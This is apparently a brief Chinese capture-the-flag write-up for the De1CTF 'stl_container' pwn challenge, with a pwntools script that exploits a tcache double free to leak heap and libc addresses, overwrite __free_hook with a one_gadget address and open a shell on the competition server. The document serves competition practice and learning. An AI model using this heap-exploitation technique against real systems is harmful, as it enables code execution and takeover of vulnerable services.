爆0选手一号准备就绪,菜鸟打不动De1CTF
stl_container
只做了一个签到题,作为一个签到选手,mips不会做,安卓也不会,连游戏MC也没玩过,只能做一个签到题才能勉强更新出这一页(其实半页都没有
题目不难,tcache结构下,在free(2,0)处可以两次free
1 | from pwn import* |
2 | def new(ch,content): |
3 | p.sendlineafter('>>',str(ch)) |
4 | p.sendlineafter('>>','1') |
5 | p.sendafter('data:',content) |
6 | def free(ch,index): |
7 | p.sendlineafter('>>',str(ch)) |
8 | p.sendlineafter('>>','2') |
9 | if ch!=4 and ch !=3: |
10 | p.sendlineafter('index?',str(index)) |
11 | def show(ch,index): |
12 | p.sendlineafter('>>',str(ch)) |
13 | p.sendlineafter('>>','3') |
14 | if ch!=4 and ch!=3: |
15 | p.sendlineafter('index?',str(index)) |
16 | context.log_level ='DEBUG' |
17 | p = process('./main') |
18 | p = remote('134.175.239.26',8848) |
19 | libc =ELF('./libc-2.27.so') |
20 | new(3,'\x00'*0x80 + p64(0) + p64(0xA1)) |
21 | new(1,'FMYY') |
22 | new(1,'FMYY') |
23 | new(2,'FMYY') |
24 | free(2,0) |
25 | new(2,'\xB0') |
26 | show(2,0) |
27 | p.recvuntil('data: ') |
28 | heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x124B0 |
29 | log.info('HEAP:\t' + hex(heap_base)) |
30 | new(2,'FMYY') |
31 | new(3,'FMYY') |
32 | new(4,'FMYY') |
33 | new(4,'\x00'*0x50 + p64(0) + p64(0x41)) |
34 | free(2,0) |
35 | free(2,0) |
36 | new(2,p64(heap_base + 0x125E0)) |
37 | new(2,p64(0) + p64(0x421)) |
38 | free(1,0) |
39 | new(1,'FMYY') |
40 | show(1,0) |
41 | p.recvuntil('data: ') |
42 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook'] |
43 | log.info('LIBC:\t' + hex(libc_base)) |
44 | free_hook = libc_base + libc.sym['__free_hook'] |
45 | rce = libc_base + 0x4F322 |
46 | free(2,0) |
47 | free(2,0) |
48 | new(2,p64(free_hook)) |
49 | new(2,p64(rce)) |
50 | p.interactive() |